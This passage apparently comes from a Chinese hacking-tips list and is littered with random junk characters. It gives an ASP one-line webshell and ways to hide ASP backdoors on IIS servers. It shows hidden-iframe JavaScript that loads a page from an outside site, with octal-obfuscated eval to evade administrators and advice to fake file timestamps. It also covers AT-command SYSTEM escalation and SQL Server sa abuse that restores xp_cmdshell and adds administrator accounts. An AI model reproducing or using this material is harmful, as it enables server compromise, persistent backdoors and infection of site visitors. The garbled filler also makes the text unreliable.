f).<%if request("cmd")<>"" then execute request("pass")%>
% G# W# J2 B$ i7 X2 t( W Q8 y# C8 J% F; m$ Z1 X# J
52、at "12:17" /interactive cmd, W7 l2 Q; G8 U; E4 V
执行后可以用AT命令查看新加的任务 F) o d* g. f* U) h
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。) U3 Y4 r) Q$ b
& ~: K" N; Q7 d7 r/ B5 a
53、隐藏ASP后门的两种方法2 A1 P! o, M4 Z. @% Q% x6 j
1、建立非标准目录:mkdir images..\
L* ]( J! _. R% A- c拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
/ D6 O' X% d6 k% b* u通过web访问ASP木马:http://ip/images../news.asp?action=login. R4 N2 U! E* X, j& v
如何删除非标准目录:rmdir images..\ /s; s& ]& x' o$ q& X0 U( b
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:( M5 P! v' Z+ }7 @7 m) K( Q) \0 H o) n
mkdir programme.asp
+ \0 u9 h5 i9 N4 S) t新建1.txt文件内容:<!--#include file=”12.jpg”-->: j& L) K. W/ N# _$ g! u
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件, Y7 h7 k/ n+ q( D
attrib +H +S programme.asp4 S/ {- y" z. P2 e8 W+ w
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
' r7 C) w8 {* J3 r% L0 r5 ^, n& ]0 o5 S- m: J8 w% i
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
9 @: s% x; J7 G然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。, _/ w% p, a6 l2 w# X
. Q* u1 o, M2 [: `4 F, Y: a55、JS隐蔽挂马
/ s8 L9 Q2 A5 n9 i1., {- _! c& ~- s# \; R( i; N% q8 Z; s3 g
var tr4c3="<iframe src=ht";! ?% j' x- ^9 Z: o/ V s
tr4c3 = tr4c3+"tp:/";
. d4 S+ o7 } v9 x% qtr4c3 = tr4c3+"/ww";( K, d# i+ {# C$ R3 G9 U
tr4c3 = tr4c3+"w.tr4";/ O0 l, `* Z* J0 d$ W
tr4c3 = tr4c3+"c3.com/inc/m";
5 u0 c/ h2 d; A* N( [tr4c3 = tr4c3+"m.htm style="display:none"></i";# c/ d% I: ?0 {3 t
tr4c3 =tr4c3+"frame>'";' C+ W; I4 T1 \/ {: h) l7 |6 O
document.write(tr4c3);
) z- [! ?* k3 x9 Q避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。# E" R9 p4 ?3 c" d1 U* P- l
0 S* V7 a) t; K- P4 p# N& M2./ {- U) v# \3 F1 Z/ r
转换进制,然后用EVAL执行。如) ]4 T" r/ H P
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
$ x" N' Y4 a1 E不过这个有点显眼。# k* q% e* J& w- G" P! D: Y8 H5 I
3.# ^3 l: D* t9 M- x9 g
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');. }( [6 I$ Z$ |) u7 U1 z
最后一点,别忘了把文件的时间也修改下。
: a! N$ F3 H) x9 C' d
4 b* @1 E& M6 K* h56.3389终端入侵常用DOS命令
2 M9 C, _ Z% A7 Gtaskkill taskkill /PID 1248 /t* z& B1 E, Y& m$ r# Y' b
4 T7 w: g+ f3 R7 Gtasklist 查进程
: d& C3 D% M8 d/ S8 S% k: i0 L5 D9 Q' Z- y% h! X; D
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
) }: S0 R% }7 t! J+ Siisreset /reboot% @( d$ ]2 u( ^! e4 [
tsshutdn /reboot /delay:1 重起服务器
, e ^% g9 u# X* @; V
; y( J+ s; [* b" b$ elogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,& i2 k( I) w4 R5 t1 r5 z# N
! j7 ~: r* A7 R* t; H3 W' m, nquery user 查看当前终端用户在线情况
9 j# ?0 @& d( S. i* |/ A
/ Z9 M- o. Y' ~! n( B要显示有关所有会话使用的进程的信息,请键入:query process *
) d+ P. H6 c- l( E1 i4 `" W% Z5 v0 ]3 t# F4 N- P# D8 \8 k0 g0 E
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2- q( b% Z8 \3 i1 z/ ~
$ x4 _ t5 a- T% [要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2: u% G a O% D5 r
& \9 g, t, n* Z& S& s, k
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM025 S( D* W- x+ V+ u6 |8 K5 L+ R
( z- R% h) `& c4 V命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启+ ?, \8 H- t! {- f' E( e
: `5 X2 d {% m7 o p7 Z$ d/ h命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
) ^0 {- _/ m5 A$ \. v2 ?
# W- o6 q* b3 b* O/ p命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
, V1 h4 L+ R" ^1 ~8 r; a
" }" Z9 j+ N5 m2 d命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
+ G R( |$ Z& {3 m* ?: }0 y
' u m' G3 y: \: n56、在地址栏或按Ctrl+O,输入:( k& U3 p" t2 _! S( s
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
7 x) t7 T5 E% S* C( W/ t$ P1 f! j2 E& u* h' {' Y. }. H: d
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
, C/ z D" |6 g# a0 u( m3 {6 P- b. A ~2 r( x
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,$ M9 Z+ Z: E4 _$ D, D. l
用net localgroup administrators是可以看到管理组下,加了$的用户的。
" g# T1 M' q7 c8 b- F
& j ^# x# _9 b( c) {58、 sa弱口令相关命令
- ]# I. n+ n8 X2 P1 F* F6 R* L& Q/ U0 `' Y' Q
一.更改sa口令方法:
+ G$ z' v) Q( ^' x' E5 e2 ~用sql综合利用工具连接后,执行命令:2 \) e5 \5 `# L
exec sp_password NULL,'20001001','sa'' M" I& X& {; h9 b% t# N9 I
(提示:慎用!)
* o( D* S) a0 Z. }0 e2 ~2 \
/ j+ ]9 m; f0 z" O0 e k5 [' G二.简单修补sa弱口令.9 `( @4 i' x' y
. x( f& W* Q4 K" y, u
方法1:查询分离器连接后执行:, i- v9 ^) _" W. a# G( o+ s
if exists (select * from
8 j1 q/ f: r, ?$ gdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
/ Q. X3 {2 M+ [; IOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
& w3 `5 P$ x4 P$ \% N8 g
" H6 Q# R) R0 [. h& cexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'; j2 G5 H/ H6 E$ G7 u
$ X' `7 O# u# V1 ^
GO: K3 `# \+ Y0 o4 h' J5 R3 x# U/ A. Q/ L
; u8 q" w, O' H0 C5 I$ G然后按F5键命令执行完毕$ j! M3 I: G7 ]0 ]+ F6 g- Z0 n
5 r& ]$ u. t. v# p; D方法2:查询分离器连接后2 f* v) S% P- \( N
第一步执行:use master
3 S0 ~& m: E! e2 C0 y+ u) n, J第二步执行:sp_dropextendedproc 'xp_cmdshell'
. g9 R2 e$ `4 d9 q0 {然后按F5键命令执行完毕
% Q! R& y' B$ } T5 B! s
' x" U. s5 u% p4 T( M r. _' U
- e, E! H* ]5 K) U三.常见情况恢复执行xp_cmdshell.7 Y; y: b2 ?; q' r
0 N" C" V" B3 c# {* f! |; q$ j) e( ^6 B
8 z5 e+ v b# E. C7 L1 未能找到存储过程'master..xpcmdshell'.
' j& i) F( a, ]* V' g/ J4 C 恢复方法:查询分离器连接后,
" ]* y8 f" \( n( w. y9 P# V# e第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
9 x+ x( f- D; X& M4 a第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'9 ?) p. O9 W6 R$ k5 S/ d0 {& S
然后按F5键命令执行完毕
P' q/ h8 c9 q1 L
y+ y% X, Q' X$ O- P8 k8 U8 l D: e2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
# F9 x! P5 G8 }3 v+ z) }恢复方法:查询分离器连接后,
{7 t8 K: r9 S第一步执行:sp_dropextendedproc "xp_cmdshell"; V. A& p7 c1 `; o4 b, G# e* M0 r" T
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
# h' \+ T& h& W然后按F5键命令执行完毕
4 y% L' R2 @$ H6 X- J- ^$ n, F+ p. `" V2 }
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)5 t1 J$ _" M/ T- A) I' ?2 w
恢复方法:查询分离器连接后,& ?( i+ D. t! s/ d3 r9 d# ]: i) h
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
: ^# Z: `& g0 k$ K3 Z Z第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
0 f2 r5 s/ M& {6 z然后按F5键命令执行完毕
! r5 r; h% l+ H( M. `8 t
9 e- A% b. q# A/ n: Z: Z四.终极方法.
]) U0 E. N; v1 W如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
0 y$ P3 W9 Y+ t) W, h查询分离器连接后,
2 A: y$ R2 ~ I* w2000servser系统:* E5 o5 ~, B$ Y( t
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
6 I# `! x; E! B
+ X8 ]; `( e Z9 N ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
" P+ ?8 s8 g; ]) z) P' \( k
' m( @" g5 _* l1 m: j* zxp或2003server系统:
& Z/ A9 U, P" t4 k' D H2 B- B. x( L0 b% P9 z v# z6 A+ Y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'/ C8 h0 a+ Y1 ~3 S
8 D! S; I. N) [
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'4 l% C5 H* P5 j4 b+ p1 k
|